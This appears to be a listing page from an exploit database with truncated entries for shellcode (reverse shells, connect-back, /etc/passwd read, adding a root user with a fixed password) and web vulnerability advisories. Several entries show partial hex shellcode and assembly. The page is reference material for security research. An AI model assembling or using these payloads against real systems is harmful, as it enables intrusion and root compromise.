11in1 1.2.1 Stable 12-31-2011 Cross Site Request Forgery / Local File Inclusion

Advisory ID: HTB23071 Product: 11in1 Vendor: 11in1 Vulnerable Versions: 1.2.1 stable 12-31-2011 and probably prior Tested Version: 1.2.1 stable 12-31-2011 Vendor Notification: 25 January 2012 Public Disclosure: 15 February 2012 Vulnerability Type: Local File Inclusion, Сross-Site Request Forgery...

linux/x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 bytes

Title :Linux x86 BackBox BackConnect & Reverse TCP SSL shellcode 442 bytes Author : TrOoN E-mail : www.facebook.com/fysl.fyslm Home : city 617 logt Draria algeria Web Site : www.1337day.com platform :backboX 32 bit Eng Type : local root / exploit / shellcode / etc download link : backbox.org...

linux/x86 Backbox /etc/passwd read shellcode 65 bytes

Title : Backbox /etc/passwd read shellcode 65 bytes Author : TrOoN E-mail : www.facebook.com/fysl.fyslm Home : city 617 logt Draria algeria Web Site : www.1337day.com Type : local root / exploit / shellcode / etc Tested on : backbox 32 bit ENG download link : backbox.org 1337Day sys : it's work...

win32/xp sp2 ARABIC (ar) Message Box Shellcode (87 bytes)

Title : Windows XP SP2 ARABIC ar Message Box Shellcode 87 bytes Author :TrOoN E-mail : email protected | Facebook : www.facebook.com/fysl.fyslm Home : city 617 logts : Draria . algeria Web Site : www.1337day.com platform : WinDows sp2 arabiC Type : shell COde | etc... WARNING : Windows XP SP2...

win32/xp sp3 (ENG) cmd.exe Sellcode 87 bytes

Title : windows/XP sp3 ENG cmd.exe Sellcode Author :TrOoN E-mail : email protected | www.facebook.com/fysl.fyslm Home : city 617 logts : Draria . algeria Web Site : www.1337day.com platform : winDows xp SP3 | tESTED IN WINDWOS XP SP 3 work Type : SHELL CODe WINDWOS WARNING : i teste in windows Xp...

cccam-version NSE Script

Detects the CCcam service software for sharing subscription TV among multiple receivers. The service normally runs on port 12000. It distinguishes itself by printing 16 random-looking bytes upon receiving a connection. Because the script attempts to detect "random-looking" bytes, it has a small...

linux/x86 Add new User/Passwd - suid(0) - shellcode 180 bytes

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

bsd/x86 execve ('/bin/sh -c "/etc/master.passwd"') setreuid(0,0) 94 bytes

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

linux/x86 sys_execve ["/bin/sh"] setresuid(0,0,0) exit(0) - 102 bytes

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

Multiple vulnerabilities in ImpressCMS

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in ImpressCMS, which can be exploited to perform cross-site scripting and local file inclusion attacks. 1 Multiple Arbitrary XSS vulnerabilities in ImpressCMS: CVE-2012-0986 1.1 Input appended to the URL after...

Linux/MIPS - reboot - 32 bytes

Linux/MIPS - reboot - 32 bytes. Shellcode exploit for linuxmips platform / Title: Linux/MIPS - reboot - 32 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x3c\x06\x43\x21" // lui a2,0x4321 "\x34\xc6\xfe\xdc" // ori a2,a2,0xfedc "\x3c\x05\x28\x12" // lui a1,0x2812...

linux/mips - connect back shellcode (port 0x7a69) - 168 bytes

/ Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor a0,t7,zero "\x01\xe0\x28\x27" // nor a1,t7,zero "\x28\x06\xff\xff" // slti a2,zero,-1 "\x24\x02\x10\x57" //...

ruby: Properly initialize the random number generator when forking new process

The SecureRandom.randombytes function in lib/securerandom.rb in Ruby before 1.8.7-p352 and 1.9.x before 1.9.2-p290 relies on PID values for initialization, which makes it easier for context-dependent attackers to predict the result string by leveraging knowledge of random strings obtained in an...

linux/x86-64 execve(/bin/sh) 52 bytes

/ Exploit Title : linux/x86-64 execve/bin/sh 52 bytes Tested on : Linux iron 2.6.38-8-generic 42-Ubuntu SMP Mon Apr 11 03:31:24 UTC 2011 x8664 x8664 x8664 GNU/Linux Date : 03/12/2011 Author : X-h4ck Email : email protected Website : http://www.pirate.al Greetz : mywisdom - Danzel - Wulns -...

linux/mips - add user(UID 0) with password - 164 bytes

/ Title: Linux/MIPS -add userUID 0 with password - 164 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com Note: Username - rOOt Password - pwn3d / include char sc = "\x24\x09\x73\x50" // li t1,29520 "\x05\x30\xff\xff" // bltzal t1,400094 "\x24\x09\x73\x50" // li t1,29520 nop /...

Linux/MIPS - add userUID 0 with password - 164 bytes

Linux/MIPS - add userUID 0 with password - 164 bytes. Shellcode exploit for linux platform / Title: Linux/MIPS -add userUID 0 with password - 164 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com Note: Username - rOOt Password - pwn3d / include char sc = "\x24\x09\x73\x50" // li t1,2952...

linux/mips - execve /bin/sh - 48 bytes

/ Title: Linux/MIPS - execve /bin/sh - 48 bytes Date: 2011-11-24 Author: rigan - imrigan at gmail.com .text .global start start: slti $a2, $zero, -1 li $t7, 0x2f2f6269 sw $t7, -12$sp li $t6, 0x6e2f7368 sw $t6, -8$sp sw $zero, -4$sp la $a0, -12$sp slti $a1, $zero, -1 li $v0, 4011 syscall 0x40404 /...

Linux/SuperH - sh4 - setuid(0) ; execve("/bin/sh", NULL, NULL) - 27 bytes

/ Linux/SuperH - sh4 - setuid0 ; execve"/bin/sh", NULL, NULL - 27 bytes Tested on debian-sh4 2.6.32-5-sh7751r by Jonathan Salwan - twitter: @jonathansalwan 400054: 17 e3 mov 23,r3 400056: 4a 24 xor r4,r4 400058: 0b c3 trapa 11 40005a: 3a 23 xor r3,r3 40005c: 0b e3 mov 11,r3 40005e: 02 c7 mova...

Local file inclusion in VtigerCRM

Vulnerability ID: HTB23054 Reference: https://www.htbridge.ch/advisory/localfileinclusioninvtigercrm.html Product: VtigerCRM Vendor: vtiger.com http://www.vtiger.com Vulnerable Version: 5.2.1 and probably prior Tested Version: 5.2.1 Vendor Notification: 19 October 2011 Vulnerability Type: Local...

VtigerCRM 5.2.1 Local File Inclusion

Vulnerability ID: HTB23054 Reference: https://www.htbridge.ch/advisory/localfileinclusioninvtigercrm.html Product: VtigerCRM Vendor: vtiger.com http://www.vtiger.com Vulnerable Version: 5.2.1 and probably prior Tested Version: 5.2.1 Vendor Notification: 19 October 2011 Vulnerability Type: Local...